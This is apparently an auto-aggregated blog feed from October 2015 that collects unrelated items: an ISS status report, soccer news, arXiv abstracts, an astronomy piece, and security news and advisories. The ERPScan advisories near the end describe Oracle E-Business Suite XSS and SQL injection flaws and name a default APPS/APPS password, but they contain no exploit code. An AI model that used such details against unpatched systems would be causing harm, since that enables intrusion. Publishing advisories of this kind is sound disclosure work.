Crew Half-Duty Day:  Today was a reduced duty day for the United States On-orbit Segment (USOS) Crew in advance of tomorrow’s EVA.   Extravehicular Activity (EVA) Preparations:  The USOS crew members made final preparations by setting up EVA tools, performing a tool audit, and preparing the Equipment Lock, and Extravehicular Mobility Units (EMUs).  In addition, all three USOS crew reviewed related procedures and briefing packages.  USOS EVA #32 (ISS Upgrades EVA) is scheduled to occur tomorrow with hatch opening taking place at approximately 7:15am CDT.   Plasma Kristall-4 (PK-4) Operations:  Kononenko continued ongoing PK-4 operations by connecting the gas supply flexhose to the Neon gas supply, opening a valve to pressurize it, reporting the pressure, and then disconnecting the flexhose.  An experiment run in PK-4 is planned to start tomorrow.  Plasma Kristall-4 is a complex European Space Agency (ESA) plasma laboratory installed in the Columbus European Physiology Module (EPM) rack and operated by Russian crewmembers.  PK-4 supports research in the field of Complex Plasmas: low temperature gaseous mixtures composed of ionized gas, neutral gas and micron-sized particles. The micro-particles become highly charged in the plasma and interact strongly with each other, which can lead to a self-organized structure of the micro-particles (i.e., “plasma crystals”).   Large Format Motion Picture Camera (IMAX):  Kelly connected the IMAX Codex to a Station Support Computer (SSC) for a downlink of recorded video files.  IMAX filmmakers intend to produce a three dimensional movie called A Perfect Planet, using ISS-based video and images to show how natural and human forces shape planet Earth. The film will also showcase NASA’s exploration efforts and highlight the ISS as a platform for scientific research and a stepping stone to deep space exploration.   Reaction Self-Test:  Kelly completed a session today for the Reaction Self-Test investigation.  Reaction Self-Test helps crewmembers objectively identify when their performance capability is degraded by various fatigue-related conditions that can occur as a result of ISS operations and time in space (e.g., acute and chronic sleep restriction, slam shifts, extravehicular activity (EVA), and residual sedation from sleep medications).   Sleep Log:  Kelly and Kornienko recorded Sleep Log entries today.  The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Urine Processing Assembly (UPA) Status:   Following yesterday’s Fluids Control Pump Assembly (FCPA) change out, today Ground Controllers updated pump parameters and successfully initiated a UPA process cycle.  The process cycle is expected to complete later this evening.   Node 1 Nadir Common Berthing Mechanism (CBM) Checkout:   Yesterday afternoon, Ground Controllers completed a successful checkout of the Node 1 Nadir CBM.  This is a routine checkout performed every 6 months, and also serves as Launch Commit Criteria (LCC) for the planned OA-4 berthing in December.   Today’s Planned Activities All activities were coompleted unless otherwise noted. NEIROIMMUNITET. CORRECTSIA RUEXP – Blood Sample Insertion into MELFI Verification and report of antivirus scan results on Auxiliary Computer System (ВКС) laptops Purging Elektron-VM Liquid Unit (БЖ) after Shutdown Replacement of RS TORU trainer cable 17КС.30Ю8230А-2030 cable Progress 429 (SM Aft) Transfers and IMS Ops JEM Terminal Computer Reboot Hair Sample Cleaning ГЖТ4 (Gas-Liquid Heat Exchanger) ВТ-7 fan screen VIBROLAB. Monitoring hardware activation Inspection and Cleaning of RS2 laptops No.1098 (POC22473J,СМ1РО_1_102), RS3 No.1144 (POC22519J,ФГБ1ПГО_4_426_1, bag 352-20 (00037779R) Demating wire harness W0142 On MCC GO RS1 Laptop Inspection and Cleaning Verification of ИП-1 Flow Sensor Position WRS – Recycle Tank Fill from EDV CARDIOVECTOR. Experiment Ops Relocating PBBs for upcoming EVA EVA Tool Config Final printout of EVA procedures ISS Crew Medical Officer (CMO) Computer Based Training (CBT) ABOUT GAGARIN FROM SPACE. Experiment Ops EVA2 Procedure Review Pille sensors prep for USOS EVA On-orbit hearing assessment using EARQ PLAZMENNIY KRISTALL. Gas Exchange in the Chamber for Neon IMAХ – Connecting to SSC USOS EVA Tool Audit WRS – Recycle Tank Fill from EDV Installation of RSK1 SW Version 1.11 and Checkout of TORU Relocation Simulator Wiping SM surfaces with Fungistat:  panels 128, 130, 131, 135 Water Transfer and Shell Compression of Progress 429 (SM Aft) Rodnik БВ1 tank Equipment Lock Preparation HAM radio session from Columbus IMS Delta File Prep СОЖ Maintenance VIBROLAB. Copy and Downlink Data IMAX – Terminate Battery Charge EVA Procedure Conference IMAX – Terminate Codex 512 GB Drive charge 24-hour ECG Monitoring (termination) 24-hour BP monitoring (terminate) IMAX – power down NEIROIMMUNITET. Stress Test NEIROIMMUNITET. Closeout Ops Reaction Self-Test (Sleep) On MCC GO Compression of Progress 429 (SM Aft) Rodnik Tank БВ1 – Closeout Ops Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observation and Photography URAGAN Observations and Photography   Completed Task List Items RMS Laptop Terminal 2 (RLT2) Hard Disk Drive Installation RMS Laptop Terminal 3 (RLT3) Swap   Ground Activities All activities were completed unless otherwise noted. EVA Preparation Commanding Backup and Standby C&C MDM Swap S-Band String 1 Activation   Three-Day Look Ahead: Wednesday, 10/28:  ISS Upgrades EVA Thursday, 10/29:  1/2 Duty Day, Post EVA activities, Plant gravity Sensing 2, VIABLE Training Friday, 10/30: EVA Preparation, JEMAL ExHAM install.   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Off Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Norm Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1N7i2dk
via IFTTT

You Can Now Hack Your Own Car — It's Legal Now

Yes, you heard right. You can now hack a car by making necessary modifications – but to the car owned by you, not your neighbors. Last year, President Obama passed a bill called 'Unlocking Consumer Choice and Wireless Competition Act,' following which users could unlock their devices – generally those locked under a contract – to use a specific service provider. The same year,


from The Hacker News http://ift.tt/1WientW
via IFTTT

Here's How Websites Are Tracking You Online

Webmasters can track all your activities on the Internet – even if you have already cleared your browsing history and deleted all saved cookies. A researcher demonstrated two unpatched flaws that can be exploited to track Millions of Internet users, allowing malicious website owners: List Building: To compile a list of visited domains by users, even if they have cleared their browsing


from The Hacker News http://ift.tt/1P4usCW
via IFTTT

Including Platini, FIFA accepts 7 in presidential race

GENEVA (AP) Seven men are in the running to replace Sepp Blatter as FIFA president, with Michel Platini's candidature pending because of his suspension from soccer.

from FOX Sports Digital http://ift.tt/1KERKJf
via IFTTT

FIFA accepts 7 entries in presidential race, Nakhid excluded

ZURICH (AP) FIFA says there are seven official entries for the presidential election to replace Sepp Blatter, with former Trinidad and Tobago player David Nakhid not on the list.

from FOX Sports Digital http://ift.tt/1S938mQ
via IFTTT

Warning: 18,000 Android Apps Contains Code that Spy on Your Text Messages

A large number of third-party Android apps have reportedly been discovered grabbing copies of all text messages received or sent to infected devices and sending them to the attackers' server. More than 63,000 Android applications use Taomike SDK – one of the biggest mobile advertisement solutions in China – to help developers display ads in their mobile apps and generate revenue.


from The Hacker News http://ift.tt/1PTHRyh
via IFTTT

Bright from the Heart Nebula


What's that inside the Heart Nebula? First, the large emission nebula dubbed IC 1805 looks, in whole, like a human heart. The nebula glows brightly in red light emitted by its most prominent element: hydrogen. The red glow and the larger shape are all created by a small group of stars near the nebula's center. In the center of the Heart Nebula are young stars from the open star cluster Melotte 15 that are eroding away several picturesque dust pillars with their energetic light and winds. The open cluster of stars contains a few bright stars nearly 50 times the mass of our Sun, many dim stars only a fraction of the mass of our Sun, and an absent microquasar that was expelled millions of years ago. The Heart Nebula is located about 7,500 light years away toward the constellation of Cassiopeia. At the top right is the companion Fishhead Nebula. via NASA http://ift.tt/1jNXN9y

Tuesday, October 27, 2015

How to keep the column value hidden or anonymous

But in the UI the business logic expects to keep the bidder name hidden or anonymous untill a particular bid is accepted. Once the bid accepted button ...

from Google Alert - anonymous http://ift.tt/1NzI33r
via IFTTT

Ravens: NFL admits referee was distracted on opening drive vs. Cardinals that resulted in illegal formation penalty (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Redesigning pattern mining algorithms for supercomputers. (arXiv:1510.07787v1 [cs.DC])

Upcoming many core processors are expected to employ a distributed memory architecture similar to currently available supercomputers, but parallel pattern mining algorithms amenable to the architecture are not comprehensively studied. We present a novel closed pattern mining algorithm with a well-engineered communication protocol, and generalize it to find statistically significant patterns from personal genome data. For distributing communication evenly, it employs global load balancing with multiple stacks distributed on a set of cores organized as a hypercube with random edges. Our algorithm achieved up to 1175-fold speedup by using 1200 cores for solving a problem with 11,914 items and 697 transactions, while the naive approach of separating the search space failed completely.



from cs.AI updates on arXiv.org http://ift.tt/1ifePvt
via IFTTT

Learning Constructive Primitives for Online Level Generation and Real-time Content Adaptation in Super Mario Bros. (arXiv:1510.07889v1 [cs.AI])

Procedural content generation (PCG) is of great interest to game design and development as it generates game content automatically. Motivated by the recent learning-based PCG framework and other existing PCG works, we propose an alternative approach to online content generation and adaptation in Super Mario Bros (SMB). Unlike most of existing works in SMB, our approach exploits the synergy between rule-based and learning-based methods to produce constructive primitives, quality yet controllable game segments in SMB. As a result, a complete quality game level can be generated online by integrating relevant constructive primitives via controllable parameters regarding geometrical features and procedure-level properties. Also the adaptive content can be generated in real time by dynamically selecting proper constructive primitives via an adaptation criterion, e.g., dynamic difficulty adjustment (DDA). Our approach is of several favorable properties in terms of content quality assurance, generation efficiency and controllability. Extensive simulation results demonstrate that the proposed approach can generate controllable yet quality game levels online and adaptable content for DDA in real time.



from cs.AI updates on arXiv.org http://ift.tt/1ifePvj
via IFTTT

Interpolating Convex and Non-Convex Tensor Decompositions via the Subspace Norm. (arXiv:1503.05479v2 [cs.LG] UPDATED)

We consider the problem of recovering a low-rank tensor from its noisy observation. Previous work has shown a recovery guarantee with signal to noise ratio $O(n^{\lceil K/2 \rceil /2})$ for recovering a $K$th order rank one tensor of size $n\times \cdots \times n$ by recursive unfolding. In this paper, we first improve this bound to $O(n^{K/4})$ by a much simpler approach, but with a more careful analysis. Then we propose a new norm called the subspace norm, which is based on the Kronecker products of factors obtained by the proposed simple estimator. The imposed Kronecker structure allows us to show a nearly ideal $O(\sqrt{n}+\sqrt{H^{K-1}})$ bound, in which the parameter $H$ controls the blend from the non-convex estimator to mode-wise nuclear norm minimization. Furthermore, we empirically demonstrate that the subspace norm achieves the nearly ideal denoising performance even with $H=O(1)$.



from cs.AI updates on arXiv.org http://ift.tt/1Gr4zqH
via IFTTT

Jedinak, Ryan picked in Australia squad for WCup qualifiers

SYDNEY (AP) Captain Mile Jedinak and goalkeeper Mat Ryan have been recalled to Australia's squad for the World Cup qualifiers agaisnt Kyrgyzstan and Bangladesh.

from FOX Sports Digital http://ift.tt/1GHqS0g
via IFTTT

Premier League champion Chelsea and Arsenal exit League Cup

STOKE-ON-TRENT, England (AP) Chelsea's miserable start to the season continued on Tuesday after it was knocked out in the fourth round of the English League Cup by 10-man Stoke on penalties.

from FOX Sports Digital http://ift.tt/1P3uB9P
via IFTTT

Inter moves back top of Serie A with 1-0 win at Bologna

BOLOGNA, Italy (AP) Mauro Icardi ended his goalscoring drought to help Inter Milan move provisionally back to the top of the Italian league on Tuesday following a 1-0 win at relegation-threatened Bologna.

from FOX Sports Digital http://ift.tt/1NzliN0
via IFTTT

[FD] RootedCON 2016 CFP

[FD] Timing attack vulnerability in most Zeus server-sides

The vulnerability I've discovered is basically a timing attack which enable a remote attacker to resolve the length in characters of the reports directory name by carefully measuring the response time of the server. While this vulnerability maybe considered as low risk, as well as found on fraudulent piece of software, I find its nature to be a very interesting and intriguing case-study which could be of a good use for future researchers. And so i share it with you good people - http://ift.tt/1N3Vzy0 Rotem Kerner

Source: Gmail -> IFTTT-> Blogger

[FD] AoF and CSRF vulnerabilities in D-Link DCS-2103

Hello list! There are Abuse of Functionality and Cross-Site Request Forgery vulnerabilities in D-Link DCS-2103 (IP camera).

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability

1. ADVISORY INFORMATION Title: Oracle E-Business Suite Cross-site Scripting Advisory ID: [ERPSCAN-15-027] Advisory URL:http://ift.tt/1Wfh1FV Date published: 20.10.2015 Vendors contacted: Oracle 2. VULNERABILITY INFORMATION Class: Cross-site Scripting Impact: impersonation, information disclosure Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-4854 CVSS Information CVSS Base Score: 4.3 / 10 AV : Access Vector (Related exploit range) Network (N) AC : Access Complexity (Required attack complexity) Medium (M) Au : Authentication (Level of authentication needed to exploit) None (N) C : Impact to Confidentiality None (N) I : Impact to Integrity Partial (P) A : Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION An anonymous attacker can create a special link that injects malicious JS code 4. VULNERABLE PACKAGES Oracle E-Business Suite 12.1.4 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS Install Oracle CPU October 2015 6. AUTHOR Nikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan) 7. TECHNICAL DESCRIPTION CfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due to lack of sanitizing the "domain" parameter. 8. REPORT TIMELINE Reported: 17.07.2015 Vendor response: 24.07.2015 Date of Public Advisory: 20.10.2015 9. REFERENCES http://ift.tt/1QLXHJH http://ift.tt/1Wfh1FV http://ift.tt/1LVYPXZ 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability

1. ADVISORY INFORMATION Title: Oracle E-Business Suite SQL injection Advisory ID: [ERPSCAN-15-026] Advisory URL: http://ift.tt/1XvOAkk Date published: 20.10.2015 Vendors contacted: Oracle 2. VULNERABILITY INFORMATION Class: SQL injection Impact: SQL injection, RCE Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-4846 CVSS Information CVSS Base Score: 3.6 / 10 AV : Access Vector (Related exploit range) Network (N) AC : Access Complexity (Required attack complexity) High (H) Au : Authentication (Level of authentication needed to exploit) Single (S) C : Impact to Confidentiality Partial (P) I : Impact to Integrity Partial (P) A : Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION The problem is caused by an SQL injection vulnerability. The code comprises an SQL statement that contains strings that can be altered by an attacker. The manipulated SQL statement can then be used to retrieve additional data from the database or to modify the data. 4. VULNERABLE PACKAGES Oracle E-Business Suite 12.1.3, 12.1.4 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS Install Oracle CPU October 2015 6. AUTHOR Nikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan) 7. TECHNICAL DESCRIPTION One of SQL extensions (afamexts.sql) does not filter user input values which may lead to SQL injection. The only defense mechanism is a password for APPS. If an attacker knows the password (for example, default password APPS/APPS), he will be able to exploit SQL injection with high privilege. 8. REPORT TIMELINE Reported: 17.07.2015 Vendor response: 24.07.2015 Date of Public Advisory: 20.10.2015 9. REFERENCES http://ift.tt/1QLXHJH http://ift.tt/1XvOAkk http://ift.tt/1LVYPXZ 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger